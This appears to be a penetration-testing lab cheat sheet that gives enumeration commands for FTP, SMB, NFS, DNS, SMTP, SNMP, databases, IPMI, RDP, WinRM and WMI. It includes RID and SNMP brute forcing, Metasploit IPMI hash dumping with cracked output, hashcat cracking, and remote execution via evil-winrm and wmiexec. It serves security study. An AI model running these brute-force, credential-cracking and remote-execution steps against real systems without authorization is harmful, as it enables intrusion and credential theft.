Service Enumeration

Enumerating the services on target

FTP

Ports: TCP 20, 21

Check for anonymous logins

Downloading all files from FTP using wget

$ wget -m --no-passive ftp://anonymous:anonymous@SERVER

Connect to FTP using SSL

$ openssl s_client -connect SERVER:21 -starttls ftp

SMB

Ports: TCP 139, 445

Check for anonymous logins

Listing SMB shares

$ smbclient -N -L //SERVER -U="<username>" --password="<password>"

Connecting to a SMB share

$ smbclient //SERVER/notes -U="<username>" --password="<password>"

Connect to an SMB share using RPC

$ rpcclient -U "<username>" 10.129.14.128

RPC Query	Description
srvinfo	Server information
enumdomains	Enumerate all domains that are deployed in the network
querydominfo	Provides domain, server, and user information of deployed domains
netshareenumall	Enumerates all available shares
netsharegetinfo <SHARE>	Provides information about a specific share
enumdomusers	Enumerates all domain users
queryuser <USER_RID>	Provides information about a specific user
querygroup <GROUP_RID>	Provides information about a group

Brute Forcing Users RID

$ for i in $(seq 500 1100);do rpcclient -N -U "" SERVER -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Or by using samrdump: https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py

NFS

Ports: TCP/UDP 2049, 111

Show available NFS share

$ showmount -e <TARGET IP>

Mounting NFS share

$ mount -t nfs <TARGET IP>:/<share name> ./<local folder>/ -o nolock

DNS

Port: UDP 53, TCP 53 for zone transfers

Get all record from a DNS server

$ dig any <hostname> @<IP>

Zone Transfer

This can be done recursively after discovering more subdomains

$ dig axfr <hostname> @<IP>

Brute force subdomains given a DNS server

This can be done recursively after discovering more subdomains

$ dnsenum --dnsserver <IP> --enum -p 0 -s 0 -f <wordlist> <domain>

SMTP

Ports: TCP 25, 465, 587, 2525

SMTP Open Relay Scanning with nmap

$ sudo nmap 10.129.14.128 -p25 --script smtp-open-relay -v

SMTP user enumeration

$ smtp-user-enum -M VRFY -U <usernames.txt> -t <TARGET IP> -w <wait time>

$ smtp-user-enum -M EXPN -U <usernames.txt> -t <TARGET IP> -w <wait time>

$ smtp-user-enum -M RCPT -U <usernames.txt> -t <TARGET IP> -w <wait time>

Evolution Mail Client

Once you have credentials for a valid account, install evolution and setup the account to that user

$ sudo apt install evolution

SNMP

Ports: UDP 161

SNMPwalk to enumerate SNMP service

$ snmpwalk -v2c -c <string> <TARGET IP>

Onesixtyone to brute force string

$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <TARGET IP>

MySQL

Ports: TCP 3306

Nmap script

$ sudo nmap <TARGET IP> -sV -sC -p3306 --script mysql*

MSSQL

Nmap script

$ sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET IP>

Connecting to MSSQL with python

Download the impacket mssql connector https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py

$ python3 mssqlclient.py Administrator@<TARGET IP> -windows-auth

IPMI

Ports: UDP 623

Metasploit Dumping IPMI hashes

msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                 Current Setting                                                    Required  Description
   ----                 ---------------                                                    --------  -----------
   CRACK_COMMON         true                                                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                     no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                        no        Save captured password hashes in john the ripper format
   PASS_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
   RHOSTS               10.129.42.195                                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                623                                                                yes       The target port
   THREADS              1                                                                  yes       The number of concurrent threads (max one per host)
   USER_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt      yes       File containing usernames, one per line



msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

hashcat to crack HP iLO ipmi passwords

$ hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

hashcat to crack generic ipmi passwords

$ hashcat -m 7300 --username hash <wordlist>

RDP (Windows)

Ports: TCP 3389

Nmap script

$ nmap -sV -sC <TARGET IP> -p3389 --script rdp*

Connecting to RDP service

$ xfreerdp /u:cry0l1t3 /p:"<password>" /v:<TARGET IP>

WinRM (Windows)

Ports: TCP 5985, 5986

Nmap script

$ nmap -sV -sC <TARGET IP> -p5985,5986 --disable-arp-ping -n

evil-winrm

https://github.com/Hackplayers/evil-winrm

$ evil-winrm -i <TARGET IP> -u <username> -p <password>

WMI

Ports: TCP 135

wmiexec

https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py

$ /usr/share/doc/python3-impacket/examples/wmiexec.py Cry0l1t3:"P455w0rD!"@10.129.201.248 "hostname"